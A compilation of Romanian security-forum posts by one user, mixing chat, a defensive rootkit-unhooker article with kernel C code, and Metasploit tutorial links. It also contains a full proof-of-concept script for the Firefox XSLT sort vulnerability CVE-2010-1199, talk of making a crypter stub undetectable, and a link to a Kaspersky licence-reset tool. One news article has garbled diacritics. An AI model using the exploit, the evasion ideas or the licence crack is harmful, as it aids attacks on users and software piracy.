Nytro

Tu te razi pe picioare? Mie mi se pare gay, dar am vazut multi care au inceput sa se rada. Vreau doar sa vad daca mai mult de jumatate din cei care voteaza o fac.

Se vede acolo. Oricum, nu cred ca va ajuta cu ceva acum ca stiti in ce limbaj e scris.

Eu nu stiu ce sa mai cred despre ce zic "cercetatorii" astia. Rar se intampla cum "prevestesc" ei, mai bine ma duc la o ghicitoare si o intreb cat de frig o sa fie.

Cred ca s-a ajuns la 10 milioane. Da, contribuie foarte multi. Si cum spunea si el, Ubuntu nu contribuie mai cu nimic. Deci _|_ Ubuntu. RedHat si SUSE se implica mult, de asemenea si Intel si nu numai. La fel, Google nu sunt prea interesati, desi Android-ul "lor" e bazat pe acest kernel. Deci _|_ Google. Si lista poate continua.

Securitate in domeniul IT, nu ma intereseaza pe mine ca ninge cu 2 zile mai mult. Edit: Nu numai securitate, orice nou si interesant din domeniul IT.

Greg Kroah Hartman on the Linux Kernel L-am vazut si eu astazi, e interesant, multe lucruri bine de stiut despre kernel, cum se dezvolta, statistici si multe altele. Youtube: http://www.youtube.com/watch?v=L2SED6sewRw

Sursa: ApriorIT Wednesday, 17 March 2010 16:31 This article includes description of simple unhooker that restores original System Service Table hooked by unknown rootkits, which hide some services and processes. 1. SST: references 2. Algorithm 3. Memory mapped files 4. Implementation 5. Demonstration 6. How to build Written by: Victor Milokum, Development Leader of Network Security Team. 1. SST: references This article is a logical continuation to the article "Driver to Hide Processes and Files" by Ivan Romananko. You can find all necessary information about System Service Table (SST) and its hooking in it. In this article I would like to present how to write your own unhooker that will restore original SST hooked by drivers like Ivan's one. 2. Algorithm My goal is to write a simple driver for SST hooking detection and removing purposes. This means that our driver should not use various Zw-functions and SST table because I suppose that SST table is corrupted by unknown rootkits. I do not care about filter drivers and function code splicers for now, but maybe I will come back to them in future. The simplest way to detect and remove hooks is to compare SST that is placed in memory with the initial SST from ntoskernel.exe file. So the goal is: 1. to find ntoskernel module in memory; 2. to find the section of ntoskernel where SST is placed and to calculate relative offset of SST in the section; 3. to find this section in the ntoskernel.exe file; 4. to calculate real address of SST in the file; 5. to read values from the file and to compare them with SST. But before the implementation I would like to present some additional information. 3. Memory mapped files in kernel mode "A memory-mapped file is a segment of virtual memory which has been assigned a direct byte-for-byte correlation with some portion of a file or file-like resource". © Wiki Yeah, we want to parse the PE file and memory mapped files are very useful for this task. And it is easy enough to use mapped files API from the kernel mode, because it is very similar to Win32 API. Instead of CreateFileMapping and MapViewOfSection functions in kernel mode driver should access NTSTATUS ZwCreateSection( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG SectionPageProtection, IN ULONG AllocationAttributes, IN HANDLE FileHandle OPTIONAL ); and NTSTATUS ZwMapViewOfSection( IN HANDLE SectionHandle, IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG_PTR ZeroBits, IN SIZE_T CommitSize, IN OUT PLARGE_INTEGER SectionOffset OPTIONAL, IN OUT PSIZE_T ViewSize, IN SECTION_INHERIT InheritDisposition, IN ULONG AllocationType, IN ULONG Win32Protect ); functions. But if we use these functions we will break our own rule not to use SST. Also, it is good for antirootkit to use extremely low level functions in the hope of being invisible to the possible rootkits. With regard to this we can use undocumented functions of Memory Manager (Mm), of course at our own risk: NTSTATUS MmCreateSection ( OUT PVOID *SectionObject, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize, IN ULONG SectionPageProtection, IN ULONG AllocationAttributes, IN HANDLE FileHandle OPTIONAL, IN PFILE_OBJECT File OPTIONAL ); NTSTATUS MmMapViewOfSection( IN PVOID SectionToMap, IN PEPROCESS Process, IN OUT PVOID *CapturedBase, IN ULONG_PTR ZeroBits, IN SIZE_T CommitSize, IN OUT PLARGE_INTEGER SectionOffset, IN OUT PSIZE_T CapturedViewSize, IN SECTION_INHERIT InheritDisposition, IN ULONG AllocationType, IN ULONG Protect ); NTSTATUS MmUnmapViewOfSection( IN PEPROCESS Process, IN PVOID BaseAddress ); NTSTATUS drv_MapAllFileEx(HANDLE hFile OPTIONAL, drv_MappedFile * pMappedFile, LARGE_INTEGER * pFileSize, ULONG Protect) { NTSTATUS status = STATUS_SUCCESS; PVOID section = 0; PCHAR pData=0; LARGE_INTEGER offset; offset.QuadPart = 0; // check zero results if (!pFileSize->QuadPart) goto calc_exit; status = MmCreateSection (&section, SECTION_MAP_READ, 0, // OBJECT ATTRIBUTES pFileSize, // MAXIMUM SIZE Protect, 0x8000000, hFile, 0 ); if (status!= STATUS_SUCCESS) goto calc_exit; status = MmMapViewOfSection(section, PsGetCurrentProcess(), (PVOID*)&pData, 0, 0, &offset, &pFileSize->LowPart, ViewUnmap, 0, Protect); if (status!= STATUS_SUCCESS) goto calc_exit; calc_exit: if (NT_SUCCESS(status)) { pMappedFile->fileSize.QuadPart = pFileSize->QuadPart; pMappedFile->pData = pData; pMappedFile->section = section; } else { if (pData) MmUnmapViewOfSection(PsGetCurrentProcess(), pData); if (section) { ObMakeTemporaryObject(section); ObDereferenceObject(section); } } return status; } This example demonstrates an alternative approach to the usage of mapped files through MmCreateSection/MmMapViewOfSection functions. The presented approach is pretty good because it doesn’t utilize Zw* functions and even handles at all, but it has one restriction. If you start this sample from DriverEntry it will work fine, but if you start it from the IRP_MJ_DEVICE_CONTROL handler you will see that MmCreateSection function fails with STATUS_ACCESS_DENIED. Why? The answer is: Zw* functions do one good thing - they set previous mode to KernelMode and this allows to utilize kernel mode pointers and handles as parameters for them (for more information see Nt vs. Zw - Clearing Confusion On The Native API article) So, the presented above function can be called only from DriverEntry or from the system thread. 4. Algorithm implementation I designed the following structure to save all ntoskernel parsing results: #define IMAGE_SIZEOF_SHORT_NAME 8 typedef struct _Drv_VirginityContext { drv_MappedFile m_mapped; HANDLE m_hFile; UCHAR m_SectionName[IMAGE_SIZEOF_SHORT_NAME+1]; ULONG m_sstOffsetInSection; char * m_mappedSST; ULONG m_imageBase; char * m_pSectionStart; char * m_pMappedSectionStart; char * m_pLoadedNtAddress; }Drv_VirginityContext; And I implemented the chosen algorithm as follows: static NTSTATUS ResolveSST(Drv_VirginityContext * pContext, SYSTEM_MODULE * pNtOsInfo) { PIMAGE_SECTION_HEADER pSection = 0; PIMAGE_SECTION_HEADER pMappedSection = 0; NTSTATUS status = 0; PNTPROC pStartSST = KeServiceDescriptorTable->ntoskrnl.ServiceTable; char * pSectionStart = 0; char * pMappedSectionStart = 0; // Drv_ResolveSectionAddress function detects // to which section pStartSST belongs // pSection will contain the section of ntoskernel.exe that contains SST pContext->m_pLoadedNtAddress = (char*)pNtOsInfo->pAddress; status = Drv_ResolveSectionAddress(pNtOsInfo->pAddress, pStartSST, &pSection); if (!NT_SUCCESS(status)) goto clean; // save section name to context memcpy(pContext->m_SectionName, pSection->Name, IMAGE_SIZEOF_SHORT_NAME); // calculate m_sstOffsetInSection - offset of SST in section pSectionStart = (char *)pNtOsInfo->pAddress + pSection->VirtualAddress; pContext->m_sstOffsetInSection = (char*)pStartSST - pSectionStart; // find section in mapped file - on disk! status = Drv_FindSection(pContext->m_mapped.pData, pSection->Name, &pMappedSection); if (!NT_SUCCESS(status)) goto clean; pMappedSectionStart = (char *)pContext->m_mapped.pData + pMappedSection->PointerToRawData; pContext->m_mappedSST = pMappedSectionStart + pContext->m_sstOffsetInSection; { // don´t forget to save ImageBase PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)pContext->m_mapped.pData; PIMAGE_NT_HEADERS pNTHeader = (PIMAGE_NT_HEADERS)((char*)dosHeader + dosHeader->e_lfanew); pContext->m_imageBase = pNTHeader->OptionalHeader.ImageBase; } pContext->m_pSectionStart = pSectionStart; pContext->m_pMappedSectionStart = pMappedSectionStart; clean: return status; } And here is the function that returns real value of SST: void Drv_GetRealSSTValue(Drv_VirginityContext * pContext, long index, void ** ppValue) { char * pSST = pContext->m_mappedSST; ULONG * pValue = ((ULONG *) pSST) + index; // now pValue points to the mapped SST entry // but entry contains offset from the beginning of ntoskernel file, // so correct it *ppValue = (void*)(*pValue + (ULONG)pContext->m_pLoadedNtAddress – pContext->m_imageBase); } After that it is quite simple to implement main functionality: virtual NTSTATUS ExecuteReal() { CAutoVirginity initer; NT_CHECK(initer.Init(&m_virginityContext)); // now we are ready to scan for(int i = 0, sstSize = Drv_GetSizeOfNtosSST(); i < sstSize; ++i) { void ** pCurrentHandler = Drv_GetNtosSSTEntry(i); void * pRealHandler = 0; Drv_GetRealSSTValue(&m_virginityContext, i, &pRealHandler); if (pRealHandler != *pCurrentHandler) { // oops, we found the difference! // unhook this entry Drv_HookSST(pCurrentHandler, pRealHandler); } } return NT_OK; } This tiny cycle completely removes all SST hooks and brings SST to its initial state. 6. Demonstration For testing purposes I developed simple console utility named unhooker.exe. This utility can be started without parameters; in this case it shows information about its abilities: 1. “stat” command shows statistics about SST hooking; 2. “unhook” command cleans SST; This sample demonstrates how to use utility to detect and erase hooks: Have fun! 6. How to build Build steps are the same as in the “Hide Driver” article. They are: 1. Install Windows Driver Developer Kit 2003 - Windows Server 2003 DDK 2. Set global environment variable "BASEDIR" to path of installed DDK. Go here: Computer -> Properties -> Advanced -> Environment variables ->System Variables -> New And set it like this: BASEDIR -> c:\winddk\3790 (You have to restart your computer after this.) If you choose Visual Studio 2003, then you can simply open UnhookerMain.sln and build all. Download: http://www.apriorit.com/downloads/unhook/release.zip http://www.apriorit.com/downloads/unhook/src.zip

Si eu pateam asa, dar de la un timp merge.

Gamer ban permanent.

Despre ce fel de baza de date e vorba?

Exista optiunea: "Disable smilies in text"

Cel mai jegos site posibil. Astia copiau exploituri de pe milw0rm (sa nu mai spun ca au folosit un script asemanator) si ziceau ca sunt gasite de ei. Ratati. Abyssesc astia sunt chiar buni. In fiecare zi cate 2 buguri in aplicatii mari, cunoscute. Bine, am testat si eu cateva exploituri ale lor si nu au mers, si am inteles ca nu sunt singurul caruia nu ii merg.

Mai bine: http://www.exploit-db.com/archive.tar.bz2

Nu iti dau nici un ban pentru un bug. Poti scrie pe bugzilla despre el, sa il repare. Dau bani pentru probleme serioase de securitate, nu dau pentru orice mica prostioara.

Momentan exista multa lene. Trebuie sa termin un articol mai intai, apoi ziceam ca fac ceva pentru Linux. Voiam sa fac Stealer pentru Linux, dar nu se incadreaza in etica mea.

Metasploit Megaprimer (Exploitation Basics and need for Metasploit) Part 1 http://securitytube.net/Metasploit-Megaprimer-%28Exploitation-Basics-and-need-for-Metasploit%29-Part-1-video.aspx Metasploit Megaprimer (Getting Started with Metasploit) Part 2 http://securitytube.net/Metasploit-Megaprimer-%28Getting-Started-with-Metasploit%29-Part-2-video.aspx Metasploit Megaprimer Part 3 (Meterpreter Basics and using Stdapi) http://securitytube.net/Metasploit-Megaprimer-Part-3-%28Meterpreter-Basics-and-using-Stdapi%29-video.aspx Metasploit Megaprimer Part 4 (Meterpreter Extensions Stdapi and Priv) http://securitytube.net/Metasploit-Megaprimer-Part-4-%28Meterpreter-Extensions-Stdapi-and-Priv%29-video.aspx Metasploit Megaprimer Part 5 (Understanding Windows Tokens and Meterpreter Incognito) http://securitytube.net/Metasploit-Megaprimer-Part-5-%28Understanding-Windows-Tokens-and-Meterpreter-Incognito%29-video.aspx Metasploit Megaprimer Part 6 (Espia and Sniffer Extensions with Meterpreter Scripts) http://securitytube.net/Metasploit-Megaprimer-Part-6-%28Espia-and-Sniffer-Extensions-with-Meterpreter-Scripts%29-video.aspx Metasploit Megaprimer Part 7 (Metasploit Database Integration and Automating Exploitation) http://securitytube.net/Metasploit-Megaprimer-Part-7-%28Metasploit-Database-Integration-and-Automating-Exploitation%29-video.aspx Metasploit Megaprimer Part 8 (Post Exploitation Kung Fu) http://securitytube.net/Metasploit-Megaprimer-Part-8-%28Post-Exploitation-Kung-Fu%29-video.aspx Metasploit Megaprimer Part 9 (Post Exploitation Privilege Escalation) http://securitytube.net/Metasploit-Megaprimer-Part-9-%28Post-Exploitation-Privilege-Escalation%29-video.aspx Metasploit Megaprimer Part 10 (Post Exploitation Log Deletion and AV Killing) http://securitytube.net/Metasploit-Megaprimer-Part-10-%28Post-Exploitation-Log-Deletion-and-AV-Killing%29-video.aspx

Nu e bun, e de 2 ani cred, il detecteaza majoritatea, cred ca 80%. Oricum, cred ca nu ar fi foarte greu de facut FUD, PE Loader-ul e intr-un ActiveX care nuc red ca e prea detectabil. Dar nu ma mai ocup momentan cu asa ceva.

L-a postat cineva (dragon, thanks) pe ISR, nu stiu exact despre ce e vorba, am vazut doar ca se foloseste un stub al meu (de la Royal Crypter v1.0) . Screenshot: http://i54.tinypic.com/xfzx1x.png Download: http://www.multiupload.com/F07DE06966 Cum sa modifici un stub. Sa ne spuna mai multe cineva care stie assembly.

The X-Frame-Options response header O masura de precautie impotriva ClickJacking-ului. Sursa: https://developer.mozilla.org/en/The_X-FRAME-OPTIONS_response_header Introduced in Gecko 1.9.2.9 (Firefox 3.6.9) The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites. Using X-Frame-Options There are two possible values for X-Frame-Options: DENY The page cannot be displayed in a frame, regardless of the site attempting to do so. SAMEORIGIN The page can only be displayed in a frame on the same origin as the page itself. In other words, if you specify DENY, not only will attempts to load the page in a frame fail when loaded from other sites, attempts to do so will fail when loaded from the same site. On the other hand, if you specify SAMEORIGIN, you can still use the page in a frame as long as the site including it in a frame it is the same as the one serving the page. Results When an attempt is made to load content into a frame, and permission is denied by the X-Frame-Options header, Firefox currently renders about: blank into the frame. At some point, an error message of some kind will be displayed in the frame instead. Browser compatibility [B]Browser Lowest version[/B] Internet Explorer 8.0 Firefox (Gecko) 3.6.9 (1.9.2.9) Opera 10.50 Safari 4.0 Chrome 4.1.249.1042 De vazut, interesant: http://blogs.msdn.com/b/ie/archive/2009/01/27/ie8-security-part-vii-clickjacking-defenses.aspx

Vulnerabilitate 0-day in Adobe Reader – exploit semnat digital de Bogdan Condurache, 9 septembri O noua vulnerabilitate a fost descoperita in produsele Adobe Reader si Acrobat. Asa cum suntem instiintati de Roel, expert al Kaspersky Lab, aceasta vulnerabilitate este foarte exploatata. Unul din lucrurile care atrage atentia este tehnologia de programare ROP care ii permit sa treaca de protectia ASLR si DEP din Windows Vista si Seven. Majoritatea vulnerabilitatilor din fisierele PDF permit descarcarea de continut malitios. De aceasta data fisierul PDF contine codul malitios. Acesta creeaza un fisier executabil in directorul %temp% pe care va incerca sa il si execute. Ce este si mai interesant este ca fisierul este are semnatura digitala valida pana in 29 octombrie, a.c. Semnatura digitala apartine unei Cooperative de Credit din Statele Unite ale Americii si este semnat de VeriSign. Nu este prima data cand creatorii de malware se folosesc de semnaturile digitale furate pentru a semna exploit-uri. Sa ne amintim doar de Stuxnet. Sa speram ca stuxnet nu a insemnat “un nou trend” si ca semnarea digitala a malware-ului se va opri. Puteti inlocui adobe Reader cu PDF X-Change Viewer, Foxit PDF Reader sau Sumatra. Toate acestea fiind soft-uri gratuite, ultimul fiind open-source. Referinte: http://www.securelist.com/en/blog/2287/Adobe_Reader_zero_day_attack_now_with_stolen_certificate Sursa: Vulnerabilitate 0-day in Adobe Reader - exploit semnat digital | WorldIT

KASPERSKY PURE Kaspersky PURE este superior oricarei solutii obisnuite de protectie a PC-ului. Acest produs ofera imunitate PC-ului tau in fata amenintarilor cibernetice de orice fel. Kaspersky PURE protejeaza integritatea si confidentialitatea tuturor bunurilor tale digitale. Kaspersky PURE iti pastreaza PC-ul curat si iti ofera linistea de care ai nevoie. Trial: http://trial.bestantivirus.ro/home_user/0_kpure/kaspersky_pure.zip KASPERSKY INTERNET SECURITY 2011 Aceasta solutie oferita de Kaspersky Lab imbina protectia unui antivirus cu un paravan de protectie personal si cu un filtru anti-spam. Kaspersky Internet Security iti protejeaza PC-ul impotriva spamului, a programelor periculoase de tip adware, spyware, dialers, precum si impotriva atacurilor de retea. Trial: http://trial.bestantivirus.ro/home_user/1_kis_2011/kaspersky_internet_security_2011.zip KASPERSKY ANTI-VIRUS 2011 Kaspersky Anti-Virus, nucleul sistemului de securitate al PC-ului tau, asigura protectie impotriva unei game largi de amenintari informatice si iti pune la dispozitie instrumentele de baza necesare pentru protectia PC-ului tau. Trial: http://trial.bestantivirus.ro/home_user/2_kav_2011/kaspersky_anti-virus_2011.zip KASPERSKY ANTI-VIRUS FOR MAC Compatibil cu Mac OS 10.6 Snow Leopard! Kaspersky Anti-Virus for Mac ofera protectie avansata pentru Mac-ul tau avand o interfata familiara utilizatorilor acestui sistem de operare si folosind tehnologii Kaspersky Lab premiate si patentate. Trial: http://trial.bestantivirus.ro/home_user/5_kav_for_mac/kaspersky_anti-virus_for_mac.zip KASPERSKY MOBILE SECURITY 9 Initiezi apeluri, trimiti mesaje text, navighezi pe Internet si comunici prin intermediul retelelor sociale in fiecare zi. Smartphone-ul este o parte importanta din viata ta. Kaspersky Mobile Security iti pastreaza datele doar pentru tine. Trial: http://trial.bestantivirus.ro/home_user/6_kms_9/kaspersky_mobile_security_9.zip KASPERSKY PASSWORD MANAGER Kaspersky Password Manager este un utilitar indispensabil pentru utilizatorul activ de Internet. Automatizeaza complet procesul de introducere a parolelor si a altor date in site-urile web si va scapa de efortul de a crea si a tine minte mai multe parole. Trial: http://trial.bestantivirus.ro/home_user/8_kpm/kaspersky_password_manager.zip KASPERSKY KRYPTOSTORAGE Kaspersky KryptoStorage iti protejeaza securizat fisierele personale impotriva accesului neautorizat si furtului de date folosind o tehnologie de ultima generatie pentru criptare transparenta, permitand stergerea permanenta a fisierelor din computer. Trial: http://trial.bestantivirus.ro/home_user/7_kks/kaspersky_kryptostorage.zip Sau de preferat descarcati de aici: http://www.kaspersky.com/trials Si am mai gasit asta (nu am testat, nu stiu daca e infectat...): This is the FINAL version of KTR911, you can reset your Kaspersky 2011/ Kaspersky 2010/ Kaspersky PURE anytime you want, even if your Kaspersky license is still valid, then you’ll get a fresh new license from Kaspersky Lab. Download: http://hotfile.com/dl/68124248/d1a2334/KTR.9.11.rar.html Sau: http://uploading.com/files/13e485dc/KTR.9.11.rar/

Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability ''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < Day 9 (Binary Analysis) | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-9-mozilla-firefox-xslt-sort-remote-code-execution-vulnerability/ http://www.exploit-db.com/sploits/moaub-day9-ba.zip ''' ''' Title : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability Version : Firefox 3.6.3 Analysis : http://www.abysssec.com Vendor : http://www.mozilla.com Impact : High/Critical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1199 ''' import sys; myStyle = """<?xml version="1.0"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:output method="html"/> <xsl:template match="/"> <html> <head> <title>Beatles</title> </head> <body> <table border="1"> <xsl:for-each select="beatles/beatle"> """ BlockCount = 43000 count = 1 while(count<BlockCount): myStyle = myStyle + "<xsl:sort select='name/abysssec"+str(count)+"' order='descending'/>\n" count = count + 1 myStyle = myStyle +""" <tr> <td><a href="{@link}"><xsl:value-of select="name/lastname"/></a></td> <td><a href="{@link}"><xsl:value-of select="name/firstname"/></a></td> </tr> </xsl:for-each> </table> </body> </html> </xsl:template> </xsl:stylesheet> """ cssFile = open("abysssec.xsl","w") cssFile.write(myStyle) cssFile.close() ''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ ''' ''' Title : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability Version : Firefox 3.6.3 Analysis : http://www.abysssec.com Vendor : http://www.mozilla.com Impact : High/Critical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1199 MOAUB Number : MOAU_09_BA ''' import sys; myStyle = """<?xml version="1.0"?> <?xml-stylesheet href="abysssec.xsl" type="text/xsl"?> <beatles> """ block = """ <beatle link="http://www.johnlennon.com"> <name> """ BlockCount = 2147483647 rowCount=10 #myStyle = myStyle + "<tree id='mytree' flex='1' rows='"+str(rowCount)+"'>\n" count = 1 while(count<BlockCount): myStyle = myStyle + """ <beatle link="http://www.johnlennon.com"> <name> """ myStyle = myStyle + " <firstname>"+"A"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>Lennon</lastname> </name> </beatle> <beatle link="http://www.paulmccartney.com"> <name>""" myStyle = myStyle + " <firstname>"+"B"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>McCartney</lastname> </name> </beatle> <beatle link="http://www.georgeharrison.com"> <name> """ myStyle = myStyle + " <firstname>"+"C"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>Harrison</lastname> </name> </beatle> <beatle link="http://www.ringostarr.com"> <name> """ myStyle = myStyle + " <firstname>"+"D"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>Starr</lastname> </name> </beatle> <beatle link="http://www.webucator.com" real="no"> <name> """ myStyle = myStyle + " <firstname>"+"E"*rowCount+"</firstname>\n" myStyle = myStyle +""" <lastname>Dunn</lastname> </name> </beatle> """ count = count - 1 myStyle = myStyle +""" </beatles> """ cssFile = open("abyssssec.xml","w") cssFile.write(myStyle) cssFile.close() Sursa: MOAUB #9 - Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability In primul rand nu vad unde e Remote Code Execution. Poate DOS, asta da. Apoi .xsl-ul, nu mil-l deschide ci imi apare sa il descarc, probabil e necesar un Content-Type potrivit, dar nu ma chinui sa testez. Inca o chestie ciudata mi se pare ca nu imi omoara ambele procesoare (core-uri) simultan, ci "profita" de ele pe rand. Cand unul e la 100%, celalalt e la un nivel redus si invers. Imi place asta. Screenshot: http://i51.tinypic.com/23vzw60.png

Firefox Updated E un video acolo. Exemplu, cu si fara hardware acceleration.

Google Chrome vs. Firefox – care e mai tare în accelerare hardware? 08 septembrie 2010 | 15:05 Liviu Mihai Cel mai nou front de lupt? în r?zboiul browserelor este accelerarea hardware. Aceast? tehnologie, cum unii dintre voi cunoa?te?i deja, permite browser-ului s? foloseasc? puterea de procesare a pl?cii video, al?turi de procesorul sistemului. La ora actual?, browserele web abia încep s? ne arate poten?ialul acceler?rii hardware. Se fac teste ?i se experimenteaz?. Chrome ?i Firefox sunt browserele care suport? la acest moment accelerarea hardware, accelerare ce poate fi folosit? efectiv de utilizatori. Internet Explorer 9 promite ?i el o accelerare eficient? dar, deocamdat?, nu este disponibil pentru download. Din aceste considerente, putem testa accelerarea hardware doar în Chrome ?i Firefox. Trebuie s? ai Google Chrome 7 dev (sau Chromium) ?i s? activezi accelerarea hardware în acest fel. În cazul lui Firefox, trebuie s? ai instalat? versiunea lansat? ast?zi - beta 5 pentru versiunea 4, care poate fi desc?rcat de aici. În Firefox, accelerarea hardware este deja activat? în mod implicit. Testul Ironic, am testat poten?ialul acceler?rii hardware din Firefox ?i Google Chrome folosind testele create de Microsoft pentru a ne demonstra cât de bun este Internet Explorer 9. Cum IE9 nu este înc? disponibil, nici m?car beta, r?mâne pentru alt? dat? testarea lui. Test drive-ul creat de Microsoft poate fi accesat la aceast? adres?. Sunt disponibile trei categorii de teste: de vitez?, de HTML5 ?i de grafic?. Cum accelerarea hardware are ca scop cre?terea vitezei browser-ului, am ales un test de vitez?. Mai precis cel numit FishIE Tank. Rezultatele Testul a fost realizat cu ferestrele browserelor maximizate, cu 250 de pe?ti. Rezultatele au fost dup? cum urmeaz?: Firefox (rezolu?ie 1215 x 694 pixeli): în medie 40 FPS (frame-uri pe secund?) - aproximativ 27% gradul de înc?rcare al procesorului Chrome (rezolu?ie 1215 x 739 pixeli): în medie 5 FPS - aproximativ 50% gradul de înc?rcare al procesorului Se poate observa c? Firefox 4 beta 5, cu un grad de ocupare a procesorului la jum?tate fa?? de Google Chrome 7 dev, a ob?inut o performan?? de 8 ori mai bun? . De ?inut cont ?i de faptul c? rezolu?ia lui Google Chrome a fost pu?in mai mare (?ine de personalizarea interfe?ei). A?adar, Firefox reu?e?te s? redirec?ioneze mai eficient efortul de procesare c?tre placa video. Prin urmare, atât nivelul de înc?rcare al procesorului, cât ?i viteza de randare a fost mult superioar?. Cum am spus, ambele browser abia încep s? "se joace" cu accelerarea hardware. Nu este un test care s? eviden?ieze un rezultat clar. Este o situa?ie temporar?, care se poate schimba rapid. În plus, r?mâne de v?zut cum se vor comporta Internet Explorer 9 ?i Opera, când vor introduce aceast? facilitate. Pân? atunci, acest test scoate în eviden?? înc? un motiv, al?turi de altele, precum func?ia Panorama, pentru care Firefox 4 va reprezenta un upgrade important.

Nu cred ca va fi mai mare. Browser-ul va fi acelasi, adica acelasi suport va trebui sa il ofere, pentru toate prostioarele din HTML5 de exemplu. Daca e nevoie de cod in plus, sa faca si ei un fel de modul, sa fie incarcat doar cand e necesar.